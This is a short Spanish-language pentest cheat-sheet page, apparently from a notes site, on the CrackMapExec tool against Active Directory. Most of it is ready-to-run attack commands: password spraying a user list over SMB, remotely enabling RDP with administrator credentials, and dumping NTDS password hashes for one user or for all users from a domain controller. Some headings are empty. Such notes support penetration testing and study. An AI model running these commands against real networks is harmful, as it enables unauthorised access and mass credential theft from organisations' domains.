search

CrackMapExec

hashtag
Enumeration

hashtag
Password Spraying

crackmapexec smb IP-RANGO -u usuarios.txt -p "Password123" -d deimcorp.local

Este ataque se usa cuando sospechas que varios usuarios pueden estar usando la misma contraseña.

hashtag
Connecction

hashtag
Command execution

crackmapexec smb IP_RANGO -u 'Administrador' -p 'P@ssw0rd!' -M rdp -o action=enable

-M rdp: Usa el módulo RDP.

-o ACTION=enable: Indica la acción a realizar, habilitar Remote Desktop Protocol (RDP).

hashtag
Only One User

crackmapexec smb AD_IP -u 'Administrador' -p 'P@ssw0rd!' --ntds vss --user 'victima'

hashtag
All Users AD

crackmapexec smb AD_IP -u 'Administrador' -p 'P@ssw0rd!' -M ntdsutil

hashtag
Brute Force

hashtag
Credential Stuffing

PreviousMsfvenomNextPsexec

Last updated